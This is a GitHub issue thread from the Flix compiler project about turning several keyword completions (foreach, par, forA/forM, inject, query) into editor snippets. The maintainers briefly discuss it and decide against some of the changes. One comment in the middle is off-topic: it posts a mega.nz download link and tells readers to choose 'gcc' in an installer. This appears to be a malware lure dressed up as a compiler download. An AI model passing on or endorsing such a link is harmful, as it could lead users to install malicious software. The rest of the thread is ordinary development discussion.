### ISSUE TITLE
Introduce more snippet completions

### ISSUE THREAD

**Issue by magnus-madsen** [flix/flix#8420]
- [ ] Refactor `foreach` keyword completion to create a snippet.
- [ ] Refactor `par` keyword completion to create a snippet.
- [ ] Refactor `forA` and `forM` keyword completion to create a snippet.
- [ ] Refactor `inject` keyword completion to create a snippet.
- [ ] Refactor `query` keyword completion to create a snippet.

**Comment by magnus-madsen** [comment]
@lozander CC

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by LoZander** [comment]
We discussed `foreach`, `forA` and `forM` snippets at a meeting if I remember correctly, and I recall we ended up deciding against it(?) But I could still take a look at the other suggested snippets here if you want @magnus-madsen :)

**Comment by magnus-madsen** [comment]
Yeah, I don't remember what we agree to. Maybe lets discuss on Monday? Meanwhile you can begin work on the query tooling for the HoverProvider.

**Comment by magnus-madsen** [comment]
We decided against.
